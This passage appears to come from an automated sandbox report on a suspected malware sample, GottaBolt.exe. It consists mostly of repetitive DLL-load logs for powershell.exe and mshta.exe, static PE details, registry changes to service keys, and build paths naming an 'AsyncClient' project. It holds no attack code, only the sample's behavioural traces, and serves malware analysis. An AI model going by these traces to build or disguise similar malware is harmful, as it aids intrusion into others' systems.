          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\GottaBolt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: GottaBolt.exeStatic PE information: certificate valid
          Source: GottaBolt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: GottaBolt.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: GottaBolt.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: GottaBolt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\user\Desktop\NEW-ExpX\AsyncClientNew\AsyncClient\obj\Release\DulidKolmen.pdb source: powershell.exe, 00000008.00000002.4206767598.000001E8F5FB7000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\user\Desktop\NEW-ExpX\orel2\AppMsipPack64-Twitter\AppMSIpack\obj\Release\GottaBolt.pdb source: GottaBolt.exe
          Source: GottaBolt.exeStatic PE information: 0x9557AA46 [Tue May 25 10:13:26 2049 UTC]
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F1C551 push ss; iretd 0_2_00007FF848F1C73F
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F1B4A9 push ebx; ret 0_2_00007FF848F1B4AA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E1D2A5 pushad ; iretd 4_2_00007FF848E1D2A6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F322F5 push eax; iretd 8_2_00007FF848F3233D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F30E10 push eax; retf 8_2_00007FF848F30E1D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F320CC push eax; iretd 8_2_00007FF848F3233D
          Source: C:\Users\user\Desktop\GottaBolt.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\LinkageJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\LinkageJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
